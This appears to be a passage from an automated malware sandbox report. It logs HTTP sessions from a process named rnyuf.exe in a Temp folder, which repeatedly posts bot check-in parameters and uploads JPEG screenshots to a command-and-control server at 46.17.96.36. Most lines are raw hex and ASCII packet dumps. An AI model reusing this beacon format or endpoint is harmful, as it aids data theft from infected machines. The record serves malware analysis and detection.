                                        Aug 29, 2021 22:28:04.724411964 CEST12834OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:04.724462986 CEST12840OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:04.724638939 CEST12849OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:04.724685907 CEST12854OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:04.759861946 CEST12857OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:04.759915113 CEST12860OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:04.760123968 CEST12865OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:04.865243912 CEST12924INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        179192.168.2.44991846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:04.908091068 CEST12925OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:05.000556946 CEST12926INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        18192.168.2.44975346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:16.533447981 CEST2960OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:16.533713102 CEST2961OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:16.534014940 CEST2971OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:16.534387112 CEST2973OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:16.569087029 CEST2981OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:16.569139004 CEST2984OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:16.569289923 CEST2993OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:16.569663048 CEST2999OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:16.604614973 CEST3020OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:16.604674101 CEST3023OUTData Raw: 4b 96 37 fe b7 7f e4 64 d4 af 14 b1 47 14 92 45 22 47 32 96 8d 99 48 0e 01 20 90 7b 8c 82 38 ee 2a 2a e9 f5 1d 2f 56 b9 f0 9f 86 2f ed 34 fb a9 6d 6d ed 26 f3 2e 12 06 68 a3 22 e6 43 f3 36 36 8e dd 4d 6d 39 f2 b5 e6 ed f9 99 46 1c c9 99 bf d8 1a
                                        Data Ascii: K7dGE"G2H {8**/V/4mm&.h"C66Mm9F3>e-le|(1q+2yK22! `F@'W}a}ZLCQnt$,e#,0OA-Qn-G?l.Kn,>U cb_2_c
                                        Aug 29, 2021 22:27:16.604959011 CEST3049OUTData Raw: de af 27 b1 1f f1 3a b4 ff 00 ae cb fc e8 cb 9f fb 1b f9 9d 78 fd 31 bf 71 ea 3e 2b ff 00 90 84 7f f5 cc 57 3a c3 9e 2b a3 f1 59 c6 a1 1f fd 73 ae 70 9e 6a 30 7f c1 46 38 ff 00 e3 c8 6e 29 7a 51 45 75 9c 03 b3 4e 18 a6 01 4e 02 a5 96 87 8a 5c d3
                                        Data Ascii: ':x1q>+W:+Yspj0F8n)zQEuNN\E-"fi*Yhpf)f"ARbr*EJ)TSSrKIZ)F2ep`T3D; se\B^_yMEMJ=+EP)hZb"@iiE
                                        Aug 29, 2021 22:27:16.719543934 CEST3067INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        180192.168.2.44991946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:05.175060987 CEST12926OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:05.175317049 CEST12926OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:05.175539017 CEST12937OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:05.175637007 CEST12939OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:05.208139896 CEST12942OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:05.208233118 CEST12950OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:05.208358049 CEST12958OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:05.208610058 CEST12965OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:28:05.242583036 CEST12978OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:05.242665052 CEST12986OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:28:05.242697954 CEST13007OUTData Raw: 4b 96 37 fe b7 7f e4 64 d4 af 14 b1 47 14 92 45 22 47 32 96 8d 99 48 0e 01 20 90 7b 8c 82 38 ee 2a 2a e9 f5 1d 2f 56 b9 f0 9f 86 2f ed 34 fb a9 6d 6d ed 26 f3 2e 12 06 68 a3 22 e6 43 f3 36 36 8e dd 4d 6d 39 f2 b5 e6 ed f9 99 46 1c c9 99 bf d8 1a
                                        Data Ascii: K7dGE"G2H {8**/V/4mm&.h"C66Mm9F3>e-le|(1q+2yK22! `F@'W}a}ZLCQnt$,e#,0OA-Qn-G?l.Kn,>U cb_2_c
                                        Aug 29, 2021 22:28:05.342699051 CEST13035INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        181192.168.2.44992046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:05.222320080 CEST12965OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:05.312277079 CEST13034INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        182192.168.2.44992146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:05.492661953 CEST13035OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:05.574990034 CEST13036INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        183192.168.2.44992246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:05.588412046 CEST13036OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:05.588502884 CEST13036OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:05.588665009 CEST13046OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:05.588738918 CEST13049OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:05.621752977 CEST13062OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:05.622253895 CEST13069OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:05.622277975 CEST13074OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:05.654500008 CEST13077OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
